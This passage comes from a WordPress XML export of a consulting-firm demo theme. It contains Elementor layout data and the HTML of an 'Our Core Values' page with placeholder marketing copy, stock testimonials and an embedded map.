consultant","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"13da770","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f627004","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":527},"member_name":"Peter Adams","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true},{"id":"35690a4","elType":"widget","settings":{"align":"center","text":"Explore More ","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-team","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:13:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:2;s:12:"align_tablet";i:1;s:12:"align_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:12:"width_tablet";i:1;}}s:8:"advanced";a:2:{s:14:"_section_style";a:5:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}s:15:"_section_border";a:2:{s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:27;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:27;s:19:"_inline_size_tablet";i:21;s:19:"_inline_size_mobile";i:4;}}s:5:"style";a:1:{s:14:"section_border";a:4:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:19:"border_width_mobile";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:6:"margin";i:2;s:13:"margin_mobile";i:1;s:13:"margin_tablet";i:2;}}}}s:8:"iheading";a:3:{s:5:"count";i:5;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:5;s:5:"title";i:5;s:11:"header_size";i:5;s:5:"align";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:5;s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:3:{s:9:"stitle_bg";i:5;s:14:"subtitle_style";i:5;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:7:{s:10:"text_color";i:2;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;s:5:"align";i:3;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:2:{s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:12;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:6;s:16:"content_position";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:8;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:10;s:14:"padding_mobile";i:6;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:2;s:19:"background_position";i:3;s:17:"background_repeat";i:3;s:16:"background_color";i:1;s:15:"background_size";i:2;}}}}s:8:"icounter";a:3:{s:5:"count";i:4;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:6:"number";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:21:"style_content_section";a:10:{s:28:"number_typography_typography";i:4;s:34:"number_typography_font_size_mobile";i:4;s:18:"title_space_mobile";i:4;s:27:"title_typography_typography";i:4;s:33:"title_typography_font_size_mobile";i:4;s:29:"number_typography_font_family";i:4;s:27:"number_typography_font_size";i:4;s:29:"number_typography_font_weight";i:1;s:28:"title_typography_font_family";i:4;s:28:"title_typography_font_weight";i:4;}}}}s:13:"iiboxcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"image_boxes";i:1;}}s:5:"style";a:1:{s:21:"style_content_section";a:1:{s:6:"box_bg";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:10:"lbar_color";i:3;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:2:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:4:"loop";i:1;}}}}s:7:"imember";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:12:"member_image";i:4;s:11:"member_name";i:3;s:12:"member_extra";i:3;s:12:"social_share";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:10:"info_style";a:3:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:24:"job_typography_font_size";i:3;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:5:"align";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Core Values</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/</link>
		<pubDate>Tue, 08 Sep 2020 04:49:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=529</guid>
		<description></description>
		<content:encoded><![CDATA[what we offer	        <h3>Make Digital Marketing  Work For Your Business</h3>	    
		<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them.</p>		
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						01						<h4>Client Learning Programs</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						02						<h4>Partnership Ecosystem</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box2-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						03						<h4>New Business Innovation</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box3-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
	        the language of business	        <h3>Consultancy That Empowers You</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<a href="#our-philo">our philosophy</a>
				<a href="#our-mission">our mission</a>
				<a href="#our-vision">our vision</a>
										<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image1-value-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Philosophy</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
										<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg 750w, https://maxbizz.s3.amazonaws.com/images/our-vision-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Mission</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
										<img width="750" height="660" src="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image2-home1-300x264.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Vision</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
				Exceptional Client Service 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				A Great Team and Winning Culture 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				A Commitment to Integrity, Fairness 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
	        testimonials	        <h3>What People Say About Us</h3>	    
											<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Mary Grey</h6>							Manager						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Samanta Fox</h6>							Designer						
			<iframe frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/maps?q=411%20University%20St%2C%20Seattle%2C%20USA&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near" title="411 University St, Seattle, USA" aria-label="411 University St, Seattle, USA"></iframe>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>529</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:49:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:49:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-core-values]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[531]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"db1842d","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"84cfb4a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"de37b10","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2519f8f","elType":"column","settings":{"_column_size":50,"_inline_size":42},"elements":[{"id":"10ad2ad","elType":"widget","settings":{"sub":"what we offer","title":"Make Digital Marketing  Work For Your Business","header_size":"h3","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"5aeaeb4","elType":"column","settings":{"_column_size":50,"_inline_size":58},"elements":[{"id":"3148f6f","elType":"widget","settings":{"editor":"<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"87d4f34","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"b70b980","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"73c0a87","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box1.jpg","id":533},"number":"01","title":"Client Learning Programs","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"bc54eaf","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2e00231","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box2.jpg","id":534},"number":"02","title":"Partnership Ecosystem","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"36da7a0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a72089a","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box3.jpg","id":535},"number":"03","title":"New Business Innovation","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iflip_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"4c9f589","elType":"section","settings":{"structure":"40","background_background":"classic","background_color":"#F5F5F5","padding":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"23a042a","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"b29ab89","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"0e7cc6c","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"3eaebc8","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"a146db1","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"7c66c5a","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"8a93a84","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"7f8aa51","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false}],"isInner":false},{"id":"076fd4b","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-value.jpg","id":540},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"87682dc","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"cf617aa","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"73","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"695bdb3","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"90b64c6","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"eb959a2","elType":"widget","settings":{"sub":"the language of business","title":"Consultancy That Empowers You","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"df732f4","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"c95075f","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"512e7f1","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"0b4ba37","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"20a92cd","elType":"widget","settings":{"title_boxes":[{"_id":"228c623","titles":"our philosophy","title_link":"#our-philo"},{"_id":"71b96ee","titles":"our mission","title_link":"#our-mission"},{"titles":"our vision","title_link":"#our-vision","_id":"02bca8a"}],"radius_title":{"unit":"px","top":"3","right":"3","bottom":"0","left":"0","isLinked":false},"title_bg":"#FFFFFF33","title_active_color":"#1B1D21","title_active_bg":"#FFFFFF"},"elements":[],"widgetType":"itabtitle"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"25cec1f","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-philo","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"69079ef","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"e1703a9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-value.jpg","id":542},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"c7f2f31","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"797598f","elType":"widget","settings":{"title":"Our Philosophy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"06391c3","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ae1ab95","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring 